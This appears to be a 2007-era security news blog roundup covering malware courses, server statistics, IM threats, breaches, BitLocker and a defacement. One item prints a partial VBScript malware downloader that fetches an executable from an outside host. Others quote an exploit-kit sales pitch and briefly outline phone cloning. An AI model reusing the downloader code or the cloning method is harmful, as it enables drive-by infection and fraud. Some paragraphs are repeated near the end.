F-secure is about to start a course called "Malware Analysis and
Antivirus Technologies" at the Helsinki University of Technology. I
really wish we had that kind of classes when I was attending college!
And since F-secure is full of cool people, they provide the slides from the
courses that were already done!
"In this post we investigate the distribution of web server software to
provide insight into how server software is correlated to servers hosting
malware binaries or engaging in drive-by-downloads."
Their numbers are slightly different from Netcraft's ones, but they give a
fairly good explanation about it. According to Google IIS and Apache are
sharing the same percentage in the overall malware distributing web
servers.
Interesting facts: in the US Malwares are served at 80% by Apache, in China
at 95% by IIS...
Castelcops.com is a popular site aiming at
providing informations assisting computer security education. Their forums are
particularly useful when you think something fishy's going on. A lot of very
well informed people are participating.
Recently a conversation about rogue domains used by the (nasty) zlob
malware was posted and the malware author came and tried to explain that
his little creation wasn't a malware and that they weren't doing anything bad.
No need to tell you the discussion literally went kaboom.
Facetime
Security Labs, an IM Security focused research lab, recently reported that
IM & P2P attacks were on the rise: a 5% inscrease of incidents targeting
public IM and P2P channels for Q2 2007 compared to Q1 2007. Just to compare,
over the same period in 2006 a 35% decrease was seen.
The SpywareGuide Greynets Blog summarizes:
From Q1 to Q2 2007, attacks spread via the mainstream networks (Yahoo, MSN
and AOL) dropped from 74 total incidents in the first period to 64 in the
second quarter. Attacks spread via AOL dropped by more than half > (from 28
incidents to 13). Overall, the MSN network accounted for 50 percent of the
attacks on the major networks, followed by Yahoo at 30 percent and AOL with 20
percent.
As we predicted earlier this year, attacks spread via Internet Relay Chat
(IRC) continue to account for a growing percentage of all attacks. In fact, the
percentage of attacks that are IRC-based has risen in each of the last six
quarters, rising from a 59 percent share in Q1 2006 to 72 percent in the
current quarter.
Didier Stevens conducted a little experiment: What if he used
adword and told people to visit his blog to get infected by a malware? His ad
was saying “Is your PC virus-free? Get it infected here!” and it ran for 6
months. Of course clicking on the link would not infect the visitor's computer,
but still, it could have. Guess how many people clicked? 409.
409 people wanted their computer infected? well, i guess people dont read.
How many person use google to surf, thinking that adwords are actually results
given by google?
Ever heard of the Cellphone Cloning method? It's a way of transfering the
identity of a phone to another, generally for the purpose of making fraudulent
calls. It's fun because if you are located near the same transmission tower as
the cellphone you cloned, you'll get copies of text messages and calls made to
the original phone. You'll need to have access to the original cellphone and
clone the sim, then upload the sim data into your phone. No easy thing.
What about being able to get any unencrypted transmission made around your
cellphone directly on it?
Warezov, Spamthru... Virus used by spammers. They are pretty easy to detect
if you can monitor http connections. Indeed more and more viruses will try to
fetch data (spam templates or updates) from dedicaded domains. If you can
monitor those domains, you can can detect infected computers on your
networks.
According to a new research report produced by security software maker
Akonix Systems, in San Diego, experts at the company unearthed some 406 new
IM-borne threats over the last 12 months, compared with 347 attacks tracked by
the company in 2005.
In 2004 the company's security analysts discovered just under 50 attacks
that were carried out either via IM or peer-to-peer technologies.
However, attacks delivered via P2P networks appear to be falling in
popularity, as Akonix researchers recorded an 11 percent decrease in that type
of threat during December 2006, with only 16 such attacks reported for the
month. Akonix traditionally reports its research of IM and P2P threats
simultaneously.
An unknown hacker has infiltrated a massive University of California, Los
Angeles database with personal information on 800,000 people, the school said
on Tuesday, in one of the worst computer breaches ever at a U.S.
university.
More and More banking institutions are replacing the usual username/password
form with a virtual keyboard. The sole purpose of thie method is to defeat
keyloggers.
Unfortunately for them, more and more malwares also defeat the purpose of
using virtual keyboards. The guys at VirusTotal analyze a
new trojan that performs a series of small screen captures of the area
aroundthe mouse cursor.It also adds a red arrow pointing exactly where the user
clicked.
This is a very interesting lecture from Frederic Raynal from
the french security mag MISC:
Cryptology is everywhere nowadays. Most of the time, people don't even know
they are actually using it on a daily basis. In this lecture, we'll show how
the crytpography is actually a double edged sword. Despite cryptology's common
use as a defensive way by providing primitives like confidentiality and
integrity, we'll see to use cryptology for malicious purpose. We use it here to
improve target selection during attacks, to save time or to be as sealth as
possible.
Vista's Entreprise and Ultimate editions will introduce a new (for Windows)
security feature called BitLocker:
BitLocker Drive Encryption is a data protection feature available in Windows
Vista Enterprise and Ultimate for client computers and in Windows Server
"Longhorn". BitLocker is Microsoft’s response to one of our top customer
requests: address the very real threats of data theft or exposure from lost,
stolen or inappropriately decommissioned PC hardware with a tightly integrated
solution in the Windows Operating System.
You can configure Vista to require an USB pen key or a flash drive to boot.
If the user can't provide the right key, the data on the harddrive stays
encrypted and (relatively) secure.
Well, ok, it's not really AJAX. This malware uses an HTML bit using
XMLHttpRequest to fetch and download the actual executable. Add some minor
obfuscation to fool antiviruses and you get W32/new-malware!Maximus on your
harddrive:
[title][/title]
[head][/head]
[body]
[script language=”VBScript”]
on error resume next
‘ due to how ajax works, the file MUST be within the same local domain
dl = “http://grupo-arroba.by.ru/grupo.exe”
‘ create adodbstream object
Set df = document.createElement(”object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
str=”Microsoft.XMLHTTP”
Set x = df.CreateObject(str,”")
Websense analyzes Web-Attacker. Web-Attacker is the most popular toolkit for
building malicious sites. It's supposedly used by one third of the malicious
sites discovered:
Dear Friends! We would like to offer you multi-component exploit
Web-Attacker, that realizes vulnerabilities in the interne browsers Internet
Explorer and Mozilla Firefox. With the help of this exploit you will be able to
install any programs on the local disks of visitors of your web pages. In the
foundation of work of the exploit Web-Attacker, there are 7 already-known
vulnerabilities in the internet browsers.
Objective of the Exploit: Hidden drop of the executable from the deleted
source to the local hard drive of the site visitor.
It costs $300 and provides a few files to help you build your own malicious
site. Just provide a malware, a keylogger or whatever you want to infect your
visitors with.
Secure Science Corporation and Michael Ligh did a very good job analyzing a
malware. Their case study is a very complet and interesting analyze of a
yet-to-be-named malware (prg.exe):
This document contains details of an exploratory case study that was
conducted on a malware specimen found in the wild by members of the Mal-Aware
Group 1 . The trojan was hosted on web servers located in the Ukraine and
Russia, and existed among several gigabytes of data encoded with a proprietary
algorithm. There were nearly 10,000 individual files available, each containing
between 70 bytes and 56 megabytes worth of stolen data that only criminals
could read…until now.
Looks like one of the polish police's sites (http://www.elblag.policja.gov.pl) was defaced this week by a team
nammed "un-root". Zone-h has a mirror
of the defacement here
Castelcops.com is a popular site aiming at
providing informations assisting computer security education. Their forums are
particularly useful when you think something fishy's going on. A lot of very
well informed people are participating.
Zone-h has a mirror
of the defacement